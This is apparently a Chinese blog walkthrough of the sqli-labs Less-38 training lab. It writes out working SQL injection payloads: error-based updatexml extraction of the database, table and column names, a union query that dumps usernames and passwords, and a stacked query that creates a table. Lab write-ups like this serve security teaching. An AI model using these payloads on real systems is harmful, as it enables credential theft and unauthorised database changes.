sqli-labs/Less-38
创始人
2024-02-06 12:35:08
0

这一关有变成了get请求的题目了

我们先判断一下是否属于数字型注入 输入如下

id=1 and 1=2

回显如下

属于字符型

然后判断一下是单引还是双引 输入1'

 

报错了 从报错信息可知 这是一个单引号注入型 我们去佐证一下呗 输入1'--+

回显如下

 可以 确实是单引号注入型

然后我选择使用报错注入

首先 爆库 输入如下

id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

 回显如下

然后爆表 输入如下

id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

 回显如下

接着进行爆字段操作 输入如下

id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)--+

 回显如下

看到这里我才知道原来这道题要考我们堆叠注入啊

爆用户名我顺便操作一下这个堆叠注入吧 输入如下

id=0' union select 1,2,group_concat(username,password) from users;create table demo like users--+

 回显如下

然后去数据库中查查看有无我刚才新创建的表格demo

 测试成功 通关成功 嗨嗨!! 

相关内容

热门资讯

美欧贸易战背后的制度性冲突 今年年初,特朗普第二次执政后再次挥舞关税大棒四处发动“贸易战”。上任不久特朗普就签署行政命令,自3月...
凌晨堵截!460余公斤!烟台一... 日前,山东烟台海警局芝罘工作站成功查获一起非法捕捞案件,现场抓获嫌疑人3人,查获渔获物460余公斤。...
南京一中学发生火情,火势已被扑... 6月8日,南京市钟英中学发生火情。现场视频显示,校园内一栋大楼冒出浓烟,现场可见火光。 视频截图 ...
“几天内,俄将发动巨大、残酷且... 【文/观察者网 邵昀】乌克兰日前发动“蛛网”行动,摧毁一批俄罗斯战略轰炸机等重要装备,连日来已经引发...
消息称苹果将放宽运营商促销政策... IT之家 6 月 8 日消息,马克・古尔曼(Mark Gurman)今晚透露,苹果将于 6 月 17...
政策“组合拳”持续显效 房地产... 从降低购房门槛到减轻房贷利息负担,从出台“好房子”规范标准到加快消化存量商品房……今年以来,多部门联...
周琦19+20孙铭徽29+8 ... 6月8日,全运会男篮资格赛A组,四川93-86力克山东。 全场数据: 四川,孙铭徽15中9,三分3...
美国非洲司令部司令炒作:中国正... 【文/观察者网 熊超然】中国和非洲国家之间开展正常军事合作,竟让一些美国人又“跳脚”了起来。 据香...